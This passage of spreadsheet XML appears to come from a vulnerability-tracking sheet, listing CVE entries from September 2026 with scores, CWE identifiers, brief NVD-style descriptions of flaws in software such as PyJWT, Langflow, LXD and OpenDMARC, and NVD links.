          <t>A vulnerability has been found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The affected element is an unknown function of the file manage-food.php. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102263</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59563</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>cve@zscaler.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>zscaler</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>Zscaler MCP Server versions 0.7.0 and 0.7.1 has an issue where HMAC confirmation tokens were not bound to the target resource identifier, allowing an MCP client or agent to replay a token generated for one resource to affect another resource of the same type. This issue is fixed in version 0.7.2.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59563</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT is_pem_format is affected because lazy PEM regular expression backtracks extensively. This occurs when a certificate-like input contains repeated BEGIN markers without a matching END marker. As a result, is_pem_format performs unbounded backtracking while searching for a PEM end marker. Consequently, an attacker can cause intensive CPU consumption. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102366</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains an unrestricted file upload vulnerability in FileController endpoints that lack authorization checks and accept arbitrary file types without validation. Attackers with any authenticated token can upload HTML or SVG files that execute scripts in administrator browsers when accessed from the local storage path, resulting in stored cross-site scripting.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102366</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101006</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Frappe HR up to 16.15.0. This vulnerability affects the function get_expense_claims/get_shift_requests/get_attendance_requests of the file hrms/api/__init__.py of the component Permission Validation. This manipulation of the argument employee causes incorrect authorization. Remote exploitation of the attack is possible. The vendor replied: "This issue has already been reported by another individual, and based on that, we have fixed it."</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101006</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101099</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ag-ui-protocol ag-ui up to 2026-09-23. This affects an unknown part of the file SseParser.kt of the component Kotlin Community SDK. Performing a manipulation results in handling of exceptional conditions. The attack may be initiated remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101099</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101143</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Eleveo Quality Management 9.7.0. Affected by this issue is some unknown functionality of the file /qm/cz.zoom.scorecard.webui.Scorecard/cz.zoom.scorecard.webui.Scorecard/QMBODownload. The manipulation results in information disclosure. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101143</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101145</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-90</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Eleveo Call Recording Software 9.7.0. This vulnerability affects unknown code of the file /callrec/userAddAction.do of the component User Management. Such manipulation of the argument Username leads to ldap injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101145</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101146</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Eleveo Quality Management 9.7.0. This issue affects the function UtilsService.createAndSaveAudit of the file /qm/cz.zoom.scorecard.webui.Scorecard/QMUtilsService of the component GWT RPC Handler. Performing a manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101146</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101278</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_get_tld of the file libopendmarc/opendmarc_tld.c : of the component PSL Wildcard Handler. Executing a manipulation can lead to origin validation error. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101278</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102244</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in MODSetter SurfSense up to 0.0.36. Impacted is an unknown function of the file surfsense_backend/app/routes/editor_routes.py of the component Document Export Feature. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.0.36.3 is recommended to address this issue. The patch is named 2faff7b3823322a9cb6797973e6caf089386c354. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102244</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102297</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder before 1.38.4 fails to apply per-monitor access restrictions in the FramesController index endpoint. Authenticated users with Events view permission can call the frames API to list frame records from monitors they are denied access to, disclosing event and frame metadata across monitor boundaries.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102297</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13018</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of untrusted input in Codecs in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to potentially perform out of bounds memory access via a crafted video file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13018</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86334</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the CLI client image export and copy functionality in Canonical LXD from 4.0.2 before 4.0.14, 5.0.10, 5.21.8, and 6.10 on all platforms allows a remote malicious or machine-in-the-middle image server to overwrite arbitrary local files and execute code on the client system via a crafted Content-Disposition header filename parameter during unified image export or copy operations into a local directory target.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86334</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101861</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Langflow 1.0.16 before 1.12.0 and 0.0.94 before 1.12.0 contain an unsafe eval() vulnerability in schema.py that allows authenticated attackers to achieve code execution by placing a Python object with a malicious __repr__ method into component input options lists. The eval() sink is triggered when a component is converted into a LangChain tool via ComponentToolkit.get_tools(), including during custom component saves through the API, by interpolating options into a Literal type string that is passed directly to eval() without safe evaluation controls.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101861</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82326</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows XSS Targeting HTML Attributes.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82326</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97026</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>3.9</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
